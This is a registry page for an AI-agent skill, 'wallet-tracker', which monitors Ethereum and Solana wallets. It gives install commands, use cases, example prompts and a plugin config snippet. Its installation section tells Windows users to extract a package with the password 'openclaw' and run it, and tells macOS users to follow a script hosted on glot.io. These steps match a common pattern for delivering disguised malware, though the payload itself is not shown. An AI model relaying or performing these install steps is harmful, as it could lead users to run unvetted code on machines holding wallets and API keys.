ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Monitor Ethereum and Solana wallets, track whale movements, and receive automated transaction alerts using the powerful OpenClaw wallet-tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-0ghsk
Or

What This Skill Does

The wallet-tracker skill is a robust monitoring solution for the OpenClaw ecosystem, designed to provide real-time insights into blockchain activity. By integrating directly with the openclaw-agent, it enables users to observe whale movements, track ERC-20 token transfers, monitor NFT activity, and keep tabs on DeFi interactions across multiple chains including Ethereum and Solana. The skill provides both modular shell-based commands for quick checks and automated Python templates for persistent monitoring, making it suitable for both casual observers and advanced traders.

Installation

To begin, ensure you have the openclaw-agent installed. For Windows, download the latest package from the official GitHub repository, extract it using the password 'openclaw', and execute the program. For macOS, follow the instructions provided in the installation script hosted on glot.io. Once the agent is active, install the skill by running the following command in your terminal:

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-0ghsk

Ensure your API keys (e.g., Etherscan) are properly configured within your environment to enable seamless data retrieval from blockchain nodes.

Use Cases

This skill is ideal for several high-value scenarios:

  • Whale Watching: Identify large inflows or outflows of assets from known whale wallets to anticipate market moves.
  • Portfolio Rebalancing: Keep track of your own or other wallets' diversification across various token standards.
  • DeFi Analytics: Monitor interactions with specific smart contracts, such as lending protocols or decentralized exchanges, to understand yield changes.
  • NFT Tracking: Receive notifications when specific NFTs are moved or sold, allowing for timely responses to market opportunities.

Example Prompts

  1. "OpenClaw, track wallet 0x71C7656... and alert me whenever a transaction exceeds 10 ETH."
  2. "Show me the last 5 ERC-20 token transfers for the Solana address [ADDRESS] using the wallet-tracker tool."
  3. "Set up a background monitor for my Ethereum portfolio and report any changes in my token balance to my dashboard."

Tips & Limitations

  • Reliability: Always ensure the openclaw-agent is running in the background; tracking will fail if the local proxy is offline.
  • Rate Limits: Be mindful of API rate limits imposed by services like Etherscan. If you are tracking many wallets simultaneously, consider using a dedicated node provider.
  • Security: Never share your private keys with the agent. This tool is designed to monitor public chain data only. Always verify that your API keys are stored in secure environment variables rather than hard-coded into your monitoring scripts.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-0ghsk": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#defi#tracking#whale-alert
Safety Score: 3/5

Flags: network-access, external-api, code-execution